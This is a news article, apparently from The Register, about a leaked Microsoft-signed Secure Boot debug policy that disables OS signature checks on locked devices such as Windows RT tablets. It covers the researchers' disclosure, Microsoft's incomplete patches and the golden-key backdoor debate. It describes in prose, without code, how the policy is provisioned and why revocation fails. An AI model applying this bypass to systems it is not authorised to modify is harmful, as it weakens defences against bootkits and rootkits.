  25. Microsoft leaked the golden keys that unlock Windows-powered tablets, phones and other devices sealed by Secure Boot – and is now scrambling to undo the blunder. These skeleton keys can be used to install non-Redmond operating systems on locked-down computers. In other words, on devices that do not allow you to disable Secure Boot even if you have administrator rights – such as ARM-based Windows RT tablets – it is now possible to sidestep this block and run, say, GNU/Linux or Android. What's more, it is believed it will be impossible for Microsoft to fully revoke the leaked keys. And perhaps most importantly: it is a reminder that demands by politicians and crimefighters for special keys, which can be used by investigators to unlock devices in criminal cases, will inevitably jeopardize the security of everyone. Microsoft's misstep was uncovered by two researchers, MY123 and Slipstream, who documented their findings here in a demoscene-themed writeup published on Tuesday. Slip believes Microsoft will find it impossible to undo its leak. Bring you up to speed on Secure Boot Before we delve further, it is important to understand that up until now we've been talking about keys metaphorically: at the heart of this matter are what's called Secure Boot policies. You don't have to completely understand all the ins and outs of Secure Boot to get your head around Microsoft's cockup. However, if you want more details of how Secure Boot works, the Linux Foundation has a guide here [PDF] and Microsoft blogged a gentle introduction here. Basically, what you need to know is this: when Secure Boot is fully enabled in the firmware of a Microsoft device, it will only boot up an operating system that is cryptographically signed by Redmond. That stops you from booting up any OS you want on your Windows RT tablet, certain Windows Phones and so on. Alongside this, there are Secure Boot policies, which are rules that are loaded and obeyed during early startup by the Windows boot manager. These policies must also be signed by Microsoft to be accepted, and are installed on devices and machines using a Microsoft-signed tool. For debugging purposes, Microsoft created and signed a special Secure Boot policy that disables the operating system signature checks, presumably to allow programmers to boot and test fresh OS builds without having to sign each one. If you provision this magic policy, that is, if you install it into your firmware, the Windows boot manager will not verify that it is booting an official Microsoft-signed operating system. It will boot anything you give it provided it is cryptographically signed, even a self-signed binary – like a shim that loads a Linux kernel. The Register understands that this debug-mode policy was shipped on retail devices, and discovered by curious minds including Slip and MY123. The policy was effectively deactivated on these products but present nonetheless. Now that golden policy has leaked onto the internet. It is signed by Microsoft's Windows Production PCA 2011 key. If you provision this onto your device or computer as an active policy, you'll disable Secure Boot. The policy is universal; it is not tied to any particular architecture or device. It works on x86 and ARM, on anything that uses the Windows boot manager. Microsoft's response According to the pair of researchers, they contacted Microsoft's security team around March to say they had found the debug-mode policy. Initially, we're told, Redmond declined to follow up the find, then decided about a month later it was a security issue and paid out a bounty reward. In July, Microsoft pushed out security patch MS16-094 in an attempt to stop people unlocking their Secure Boot-sealed devices. That added a bunch of policies, including the debug-mode policy, to a revocation list held in the firmware that's checked during startup by the Windows boot manager. That didn't fully kill off the magic policy, however. The revocation list is checked by the boot manager after policies are loaded. By the point in the startup sequence, it's too late. However, a Microsoft tool used to provision the policy into the firmware does check the revocation list, and thus refuses to accept the magic policy when you try to install it, so MS16-094 acts mere as a minor roadblock. This week, Microsoft issued patch MS16-100, which revokes more stuff but doesn't affect the golden policy, we're told. A third patch is due to arrive next month as a follow-up. If you haven't installed the July fix yet, you can use this script to provision the unlock policy onto your ARM-powered Windows RT tablet. You must be an administrator to update the firmware. After that, you can set about trying to boot a non-Windows OS or any other self-signed EFI binary. We're told by one brave tester that this policy installation method worked on a Windows RT tab that was not patched for MS16-094. The aforementioned script works by running a Microsoft-provided EFI binary during the next reboot that inserts the debug-mode policy into storage space on the motherboard that only the firmware and boot manager are allowed to access. If you have installed the July update, the above script will fail because the updated revocation list will be checked by Microsoft's installation tool and the magic policy will be rejected before it can be provisioned. In about a week's time, MY123 is expected to release a package that will work around this and install the debug-mode policy on all devices, including Windows RT tablets. People are particularly keen to unlock their ARM-powered Surface fondleslabs and install a new operating system because Microsoft has all but abandoned the platform. Windows RT is essentially Windows 8.x ported to 32-bit ARMv7-compatible processors, and Microsoft has stopped developing it. Mainstream support for Surface RT tabs runs out in 2017 and Windows RT 8.1 in 2018. A policy similar to the leaked debug-mode policy can be used to unlock Windows Phone handsets, too, so alternative operating systems can be installed. A policy provision tool for Windows Phone is already available. We expect to hear more about that soon. This Secure Boot misstep also affects Windows PCs and servers, but it's not that big a deal for them because these machines are typically unlocked anyway. You can boot your unrestricted computer into its firmware settings, and switch off Secure Boot, or delete all the keys from its database to disable it, if you really want to. You don't need any debug-mode tricks to do that. In the unlikely event you're using a locked-down Secure Boot PC and you have admin rights on the box, and you want to boot something else, all the above is going to be of interest to you. If you're an IT admin who is relying on Secure Boot to prevent the loading of unsigned binaries and drivers – such as rootkits and bootkits – then all the above is going to worry you. FBI and golden keys To reiterate, these Microsoft-signed resources – the debug-mode policy and the EFI installation tool – are only meant to be used by developers debugging drivers and other low-level operating system code. In the hands of Windows RT slab owners, whose devices are completely locked down, they become surprisingly powerful. It's akin to giving special secret keys to the police and the Feds that grant investigators full access to people's devices and computer systems. Such backdoor keys can and most probably will fall into the wrong hands: rather than be used exclusively for fighting crime, they will be found and exploited by criminals to compromise communications and swipe sensitive personal information. Anyone who thinks government servers holding these keys are safe need only be reminded of the OPM megahack; anyone who thinks these keys cannot be extracted from software or hardware need only spend a weekend with a determined reserve-engineer and a copy of IDA Pro. The Secure Boot policies Microsoft is rushing to revoke can't be used to backdoor conversations or remotely hijack systems, but they remind us that this kind of information rarely stays secret. "This is a perfect real world example about why your idea of backdooring cryptosystems with a 'secure golden key' is very bad," Slipstream wrote, addressing the FBI in particular. "Smarter people than me have been telling this to you for so long. It seems you have your fingers in your ears. You seriously don't understand still? Microsoft implemented a 'secure golden key' system. And the golden keys got released by Microsoft's own stupidity. Now, what happens if you tell everyone to make a 'secure golden key' system?" We asked Microsoft for comment, and a spokesperson was not immediately available. Article source